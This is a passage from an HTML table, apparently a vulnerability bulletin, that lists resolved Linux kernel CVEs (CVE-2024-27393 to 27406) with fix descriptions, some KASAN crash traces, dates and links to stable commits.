<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27393" target="_blank">CVE-2024-27393</a><br><a href="https://git.kernel.org/stable/c/037965402a010898d34f4e35327d22c0a95cd51f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/27aa3e4b3088426b7e34584274ad45b5afaf7629" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4143b9479caa29bb2380f3620dcbe16ea84eb3b1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7c1250796b6c262b505a46192f4716b8c6a6a8c6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c8b7b2f158d9d4fb89cd2f68244af154f7549bb4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: tcp: Fix Use-After-Free in tcp_ao_connect_init Since call_rcu, which is called in the hlist_for_each_entry_rcu traversal of tcp_ao_connect_init, is not part of the RCU read critical section, it is possible that the RCU grace period will pass during the traversal and the key will be free. To prevent this, it should be changed to hlist_for_each_entry_safe.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27394" target="_blank">CVE-2024-27394</a><br><a href="https://git.kernel.org/stable/c/80e679b352c3ce5158f3f778cfb77eb767e586fb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ca4fb6c6764b3f75b4f5aa81db1536291897ff7f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: Fix Use-After-Free in ovs_ct_exit Since kfree_rcu, which is called in the hlist_for_each_entry_rcu traversal of ovs_ct_limit_exit, is not part of the RCU read critical section, it is possible that the RCU grace period will pass during the traversal and the key will be free. To prevent this, it should be changed to hlist_for_each_entry_safe.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27395" target="_blank">CVE-2024-27395</a><br><a href="https://git.kernel.org/stable/c/2db9a8c0a01fa1c762c1e61a13c212c492752994" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/35880c3fa6f8fe281a19975d2992644588ca33d3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/589523cf0b384164e445dd5db8d5b1bf97982424" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5ea7b72d4fac2fdbc0425cd8f2ea33abe95235b2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9048616553c65e750d43846f225843ed745ec0d4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bca6fa2d9a9f560e6b89fd5190b05cc2f5d422c1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/eaa5e164a2110d2fb9e16c8a29e4501882235137" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/edee0758747d7c219e29db9ed1d4eb33e8d32865" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net: gtp: Fix Use-After-Free in gtp_dellink Since call_rcu, which is called in the hlist_for_each_entry_rcu traversal of gtp_dellink, is not part of the RCU read critical section, it is possible that the RCU grace period will pass during the traversal and the key will be free. To prevent this, it should be changed to hlist_for_each_entry_safe.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27396" target="_blank">CVE-2024-27396</a><br><a href="https://git.kernel.org/stable/c/07b20d0a3dc13fb1adff10b60021a4924498da58" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/0caff3e6390f840666b8dc1ecebf985c2ef3f1dd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/25a1c2d4b1fcf938356a9688a96a6456abd44b29" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2aacd4de45477582993f8a8abb9505a06426bfb6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2e74b3fd6bf542349758f283676dff3660327c07" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/718df1bc226c383dd803397d7f5d95557eb81ac7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cd957d1716ec979d8f5bf38fc659aeb9fdaa2474" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f2a904107ee2b647bb7794a1a82b67740d7c8a64" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: use timestamp to check for set element timeout Add a timestamp field at the beginning of the transaction, store it in the nftables per-netns area. Update set backend .insert, .deactivate and sync gc path to use the timestamp, this avoids that an element expires while control plane transaction is still unfinished. .lookup and .update, which are used from packet path, still use the current time to check if the element has expired. And .get path and dump also since this runs lockless under rcu read size lock. Then, there is async gc which also needs to check the current time since it runs asynchronously from a workqueue.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27397" target="_blank">CVE-2024-27397</a><br><a href="https://git.kernel.org/stable/c/383182db8d58c4237772ba0764cded4938a235c3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7395dfacfff65e9938ac0889dafa1ab01e987d15" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: Bluetooth: Fix use-after-free bugs caused by sco_sock_timeout When the sco connection is established and then, the sco socket is releasing, timeout_work will be scheduled to judge whether the sco disconnection is timeout. The sock will be deallocated later, but it is dereferenced again in sco_sock_timeout. As a result, the use-after-free bugs will happen. The root cause is shown below: Cleanup Thread | Worker Thread sco_sock_release | sco_sock_close | __sco_sock_close | sco_sock_set_timer | schedule_delayed_work | sco_sock_kill | (wait a time) sock_put(sk) //FREE | sco_sock_timeout | sock_hold(sk) //USE The KASAN report triggered by POC is shown below: [ 95.890016] ================================================================== [ 95.890496] BUG: KASAN: slab-use-after-free in sco_sock_timeout+0x5e/0x1c0 [ 95.890755] Write of size 4 at addr ffff88800c388080 by task kworker/0:0/7 ... [ 95.890755] Workqueue: events sco_sock_timeout [ 95.890755] Call Trace: [ 95.890755] &lt;TASK&gt; [ 95.890755] dump_stack_lvl+0x45/0x110 [ 95.890755] print_address_description+0x78/0x390 [ 95.890755] print_report+0x11b/0x250 [ 95.890755] ? __virt_addr_valid+0xbe/0xf0 [ 95.890755] ? sco_sock_timeout+0x5e/0x1c0 [ 95.890755] kasan_report+0x139/0x170 [ 95.890755] ? update_load_avg+0xe5/0x9f0 [ 95.890755] ? sco_sock_timeout+0x5e/0x1c0 [ 95.890755] kasan_check_range+0x2c3/0x2e0 [ 95.890755] sco_sock_timeout+0x5e/0x1c0 [ 95.890755] process_one_work+0x561/0xc50 [ 95.890755] worker_thread+0xab2/0x13c0 [ 95.890755] ? pr_cont_work+0x490/0x490 [ 95.890755] kthread+0x279/0x300 [ 95.890755] ? pr_cont_work+0x490/0x490 [ 95.890755] ? kthread_blkcg+0xa0/0xa0 [ 95.890755] ret_from_fork+0x34/0x60 [ 95.890755] ? kthread_blkcg+0xa0/0xa0 [ 95.890755] ret_from_fork_asm+0x11/0x20 [ 95.890755] &lt;/TASK&gt; [ 95.890755] [ 95.890755] Allocated by task 506: [ 95.890755] kasan_save_track+0x3f/0x70 [ 95.890755] __kasan_kmalloc+0x86/0x90 [ 95.890755] __kmalloc+0x17f/0x360 [ 95.890755] sk_prot_alloc+0xe1/0x1a0 [ 95.890755] sk_alloc+0x31/0x4e0 [ 95.890755] bt_sock_alloc+0x2b/0x2a0 [ 95.890755] sco_sock_create+0xad/0x320 [ 95.890755] bt_sock_create+0x145/0x320 [ 95.890755] __sock_create+0x2e1/0x650 [ 95.890755] __sys_socket+0xd0/0x280 [ 95.890755] __x64_sys_socket+0x75/0x80 [ 95.890755] do_syscall_64+0xc4/0x1b0 [ 95.890755] entry_SYSCALL_64_after_hwframe+0x67/0x6f [ 95.890755] [ 95.890755] Freed by task 506: [ 95.890755] kasan_save_track+0x3f/0x70 [ 95.890755] kasan_save_free_info+0x40/0x50 [ 95.890755] poison_slab_object+0x118/0x180 [ 95.890755] __kasan_slab_free+0x12/0x30 [ 95.890755] kfree+0xb2/0x240 [ 95.890755] __sk_destruct+0x317/0x410 [ 95.890755] sco_sock_release+0x232/0x280 [ 95.890755] sock_close+0xb2/0x210 [ 95.890755] __fput+0x37f/0x770 [ 95.890755] task_work_run+0x1ae/0x210 [ 95.890755] get_signal+0xe17/0xf70 [ 95.890755] arch_do_signal_or_restart+0x3f/0x520 [ 95.890755] syscall_exit_to_user_mode+0x55/0x120 [ 95.890755] do_syscall_64+0xd1/0x1b0 [ 95.890755] entry_SYSCALL_64_after_hwframe+0x67/0x6f [ 95.890755] [ 95.890755] The buggy address belongs to the object at ffff88800c388000 [ 95.890755] which belongs to the cache kmalloc-1k of size 1024 [ 95.890755] The buggy address is located 128 bytes inside of [ 95.890755] freed 1024-byte region [ffff88800c388000, ffff88800c388400) [ 95.890755] [ 95.890755] The buggy address belongs to the physical page: [ 95.890755] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff88800c38a800 pfn:0xc388 [ 95.890755] head: order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0 [ 95.890755] ano ---truncated---</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27398" target="_blank">CVE-2024-27398</a><br><a href="https://git.kernel.org/stable/c/012363cb1bec5f33a7b94629ab2c1086f30280f2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1b33d55fb7355e27f8c82cd4ecd560f162469249" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3212afd00e3cda790fd0583cb3eaef8f9575a014" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/33a6e92161a78c1073d90e27abe28d746feb0a53" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/483bc08181827fc475643272ffb69c533007e546" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/50c2037fc28df870ef29d9728c770c8955d32178" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6a18eeb1b3bbc67c20d9609c31dca6a69b4bcde5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bfab2c1f7940a232cd519e82fff137e308abfd93" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: Bluetooth: l2cap: fix null-ptr-deref in l2cap_chan_timeout There is a race condition between l2cap_chan_timeout() and l2cap_chan_del(). When we use l2cap_chan_del() to delete the channel, the chan-&gt;conn will be set to null. But the conn could be dereferenced again in the mutex_lock() of l2cap_chan_timeout(). As a result the null pointer dereference bug will happen. The KASAN report triggered by POC is shown below: [ 472.074580] ================================================================== [ 472.075284] BUG: KASAN: null-ptr-deref in mutex_lock+0x68/0xc0 [ 472.075308] Write of size 8 at addr 0000000000000158 by task kworker/0:0/7 [ 472.075308] [ 472.075308] CPU: 0 PID: 7 Comm: kworker/0:0 Not tainted 6.9.0-rc5-00356-g78c0094a146b #36 [ 472.075308] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu4 [ 472.075308] Workqueue: events l2cap_chan_timeout [ 472.075308] Call Trace: [ 472.075308] &lt;TASK&gt; [ 472.075308] dump_stack_lvl+0x137/0x1a0 [ 472.075308] print_report+0x101/0x250 [ 472.075308] ? __virt_addr_valid+0x77/0x160 [ 472.075308] ? mutex_lock+0x68/0xc0 [ 472.075308] kasan_report+0x139/0x170 [ 472.075308] ? mutex_lock+0x68/0xc0 [ 472.075308] kasan_check_range+0x2c3/0x2e0 [ 472.075308] mutex_lock+0x68/0xc0 [ 472.075308] l2cap_chan_timeout+0x181/0x300 [ 472.075308] process_one_work+0x5d2/0xe00 [ 472.075308] worker_thread+0xe1d/0x1660 [ 472.075308] ? pr_cont_work+0x5e0/0x5e0 [ 472.075308] kthread+0x2b7/0x350 [ 472.075308] ? pr_cont_work+0x5e0/0x5e0 [ 472.075308] ? kthread_blkcg+0xd0/0xd0 [ 472.075308] ret_from_fork+0x4d/0x80 [ 472.075308] ? kthread_blkcg+0xd0/0xd0 [ 472.075308] ret_from_fork_asm+0x11/0x20 [ 472.075308] &lt;/TASK&gt; [ 472.075308] ================================================================== [ 472.094860] Disabling lock debugging due to kernel taint [ 472.096136] BUG: kernel NULL pointer dereference, address: 0000000000000158 [ 472.096136] #PF: supervisor write access in kernel mode [ 472.096136] #PF: error_code(0x0002) - not-present page [ 472.096136] PGD 0 P4D 0 [ 472.096136] Oops: 0002 [#1] PREEMPT SMP KASAN NOPTI [ 472.096136] CPU: 0 PID: 7 Comm: kworker/0:0 Tainted: G B 6.9.0-rc5-00356-g78c0094a146b #36 [ 472.096136] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu4 [ 472.096136] Workqueue: events l2cap_chan_timeout [ 472.096136] RIP: 0010:mutex_lock+0x88/0xc0 [ 472.096136] Code: be 08 00 00 00 e8 f8 23 1f fd 4c 89 f7 be 08 00 00 00 e8 eb 23 1f fd 42 80 3c 23 00 74 08 48 88 [ 472.096136] RSP: 0018:ffff88800744fc78 EFLAGS: 00000246 [ 472.096136] RAX: 0000000000000000 RBX: 1ffff11000e89f8f RCX: ffffffff8457c865 [ 472.096136] RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffff88800744fc78 [ 472.096136] RBP: 0000000000000158 R08: ffff88800744fc7f R09: 1ffff11000e89f8f [ 472.096136] R10: dffffc0000000000 R11: ffffed1000e89f90 R12: dffffc0000000000 [ 472.096136] R13: 0000000000000158 R14: ffff88800744fc78 R15: ffff888007405a00 [ 472.096136] FS: 0000000000000000(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000 [ 472.096136] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 472.096136] CR2: 0000000000000158 CR3: 000000000da32000 CR4: 00000000000006f0 [ 472.096136] Call Trace: [ 472.096136] &lt;TASK&gt; [ 472.096136] ? __die_body+0x8d/0xe0 [ 472.096136] ? page_fault_oops+0x6b8/0x9a0 [ 472.096136] ? kernelmode_fixup_or_oops+0x20c/0x2a0 [ 472.096136] ? do_user_addr_fault+0x1027/0x1340 [ 472.096136] ? _printk+0x7a/0xa0 [ 472.096136] ? mutex_lock+0x68/0xc0 [ 472.096136] ? add_taint+0x42/0xd0 [ 472.096136] ? exc_page_fault+0x6a/0x1b0 [ 472.096136] ? asm_exc_page_fault+0x26/0x30 [ 472.096136] ? mutex_lock+0x75/0xc0 [ 472.096136] ? mutex_lock+0x88/0xc0 [ 472.096136] ? mutex_lock+0x75/0xc0 [ 472.096136] l2cap_chan_timeo ---truncated---</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27399" target="_blank">CVE-2024-27399</a><br><a href="https://git.kernel.org/stable/c/06acb75e7ed600d0bbf7bff5628aa8f24a97978c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6466ee65e5b27161c846c73ef407f49dfa1bd1d9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8960ff650aec70485b40771cd8e6e8c4cb467d33" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/955b5b6c54d95b5e7444dfc81c95c8e013f27ac0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/adf0398cee86643b8eacde95f17d073d022f782c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e137e2ba96e51902dc2878131823a96bf8e638ae" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e97e16433eb4533083b096a3824b93a5ca3aee79" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/eb86f955488c39526534211f2610e48a5cf8ead4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: once more fix the call oder in amdgpu_ttm_move() v2 This reverts drm/amdgpu: fix ftrace event amdgpu_bo_move always move on same heap. The basic problem here is that after the move the old location is simply not available any more. Some fixes were suggested, but essentially we should call the move notification before actually moving things because only this way we have the correct order for DMA-buf and VM move notifications as well. Also rework the statistic handling so that we don't update the eviction counter before the move. v2: add missing NULL check</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27400" target="_blank">CVE-2024-27400</a><br><a href="https://git.kernel.org/stable/c/0c7ed3ed35eec9138b88d42217b5a6b9a62bda4d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5c25b169f9a0b34ee410891a96bc9d7b9ed6f9be" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9a4f6e138720b6e9adf7b82a71d0292f3f276480" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d3a9331a6591e9df64791e076f6591f440af51c3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: firewire: nosy: ensure user_length is taken into account when fetching packet contents Ensure that packet_buffer_get respects the user_length provided. If the length of the head packet exceeds the user_length, packet_buffer_get will now return 0 to signify to the user that no data were read and a larger buffer size is required. Helps prevent user space overflows.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27401" target="_blank">CVE-2024-27401</a><br><a href="https://git.kernel.org/stable/c/1fe60ee709436550f8cfbab01295936b868d5baa" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/38762a0763c10c24a4915feee722d7aa6e73eb98" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4ee0941da10e8fdcdb34756b877efd3282594c1f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/539d51ac48bcfcfa1b3d4a85f8df92fa22c1d41c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/67f34f093c0f7bf33f5b4ae64d3d695a3b978285" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/79f988d3ffc1aa778fc5181bdfab312e57956c6b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7b8c7bd2296e95b38a6ff346242356a2e7190239" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cca330c59c54207567a648357835f59df9a286bb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: phonet/pep: fix racy skb_queue_empty() use The receive queues are protected by their respective spin-lock, not the socket lock. This could lead to skb_peek() unexpectedly returning NULL or a pointer to an already dequeued socket buffer.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27402" target="_blank">CVE-2024-27402</a><br><a href="https://git.kernel.org/stable/c/0a9f558c72c47472c38c05fcb72c70abb9104277" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7d2a894d7f487dcb894df023e9d3014cf5b93fe5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8ef4fcc7014b9f93619851d6b78d6cc2789a4c88" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9d5523e065b568e79dfaa2ea1085a5bcf74baf78" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_flow_offload: reset dst in route object after setting up flow dst is transferred to the flow object, route object does not own it anymore. Reset dst in route object, otherwise if flow_offload_add() fails, error path releases dst twice, leading to a refcount underflow.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27403" target="_blank">CVE-2024-27403</a><br><a href="https://git.kernel.org/stable/c/012df10717da02367aaf92c65f9c89db206c15f4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4c167af9f6b5ae4a5dbc243d5983c295ccc2e43c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/558b00a30e05753a62ecc7e05e939ca8f0241148" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/670548c8db44d76e40e1dfc06812bca36a61e9ae" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9e0f0430389be7696396c62f037be4bf72cf93e3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: mptcp: fix data races on remote_id Similar to the previous patch, address the data race on remote_id, adding the suitable ONCE annotations.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27404" target="_blank">CVE-2024-27404</a><br><a href="https://git.kernel.org/stable/c/2dba5774e8ed326a78ad4339d921a4291281ea6e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/967d3c27127e71a10ff5c083583a038606431b61" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/987c3ed7297e5661bc7f448f06fc366e497ac9b2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e64148635509bf13eea851986f5a0b150e5bd066" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: usb: gadget: ncm: Avoid dropping datagrams of properly parsed NTBs It is observed sometimes when tethering is used over NCM with Windows 11 as host, at some instances, the gadget_giveback has one byte appended at the end of a proper NTB. When the NTB is parsed, unwrap call looks for any leftover bytes in SKB provided by u_ether and if there are any pending bytes, it treats them as a separate NTB and parses it. But in case the second NTB (as per unwrap call) is faulty/corrupt, all the datagrams that were parsed properly in the first NTB and saved in rx_list are dropped. Adding a few custom traces showed the following: [002] d..1 7828.532866: dwc3_gadget_giveback: ep1out: req 000000003868811a length 1025/16384 zsI ==&gt; 0 [002] d..1 7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb toprocess: 1025 [002] d..1 7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342 [002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb seq: 0xce67 [002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x400 [002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb ndp_len: 0x10 [002] d..1 7828.532869: ncm_unwrap_ntb: K: Parsed NTB with 1 frames In this case, the giveback is of 1025 bytes and block length is 1024. The rest 1 byte (which is 0x00) won't be parsed resulting in drop of all datagrams in rx_list. Same is case with packets of size 2048: [002] d..1 7828.557948: dwc3_gadget_giveback: ep1out: req 0000000011dfd96e length 2049/16384 zsI ==&gt; 0 [002] d..1 7828.557949: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342 [002] d..1 7828.557950: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x800 Lecroy shows one byte coming in extra confirming that the byte is coming in from PC: Transfer 2959 - Bytes Transferred(1025) Timestamp((18.524 843 590) - Transaction 8391 - Data(1025 bytes) Timestamp(18.524 843 590) --- Packet 4063861 Data(1024 bytes) Duration(2.117us) Idle(14.700ns) Timestamp(18.524 843 590) --- Packet 4063863 Data(1 byte) Duration(66.160ns) Time(282.000ns) Timestamp(18.524 845 722) According to Windows driver, no ZLP is needed if wBlockLength is non-zero, because the non-zero wBlockLength has already told the function side the size of transfer to be expected. However, there are in-market NCM devices that rely on ZLP as long as the wBlockLength is multiple of wMaxPacketSize. To deal with such devices, it pads an extra 0 at end so the transfer is no longer multiple of wMaxPacketSize.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27405" target="_blank">CVE-2024-27405</a><br><a href="https://git.kernel.org/stable/c/059285e04ebb273d32323fbad5431c5b94f77e48" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2b7ec68869d50ea998908af43b643bca7e54577e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2cb66b62a5d64ccf09b0591ab86fb085fa491fc5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/35b604a37ec70d68b19dafd10bbacf1db505c9ca" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/57ca0e16f393bb21d69734e536e383a3a4c665fd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/76c51146820c5dac629f21deafab0a7039bc3ccd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a31cf46d108dabce3df80b3e5c07661e24912151" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c7f43900bc723203d7554d299a2ce844054fab8e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: lib/Kconfig.debug: TEST_IOV_ITER depends on MMU Trying to run the iov_iter unit test on a nommu system such as the qemu kc705-nommu emulation results in a crash. KTAP version 1 # Subtest: iov_iter # module: kunit_iov_iter 1..9 BUG: failure at mm/nommu.c:318/vmap()! Kernel panic - not syncing: BUG! The test calls vmap() directly, but vmap() is not supported on nommu systems, causing the crash. TEST_IOV_ITER therefore needs to depend on MMU.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27406" target="_blank">CVE-2024-27406</a><br><a href="https://git.kernel.org/stable/c/1eb1e984379e2da04361763f66eec90dd75cf63e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9e6e541b97762d5b1143070067f7c68f39a408f8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e6316749d603fe9c4c91f6ec3694e06e4de632a3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
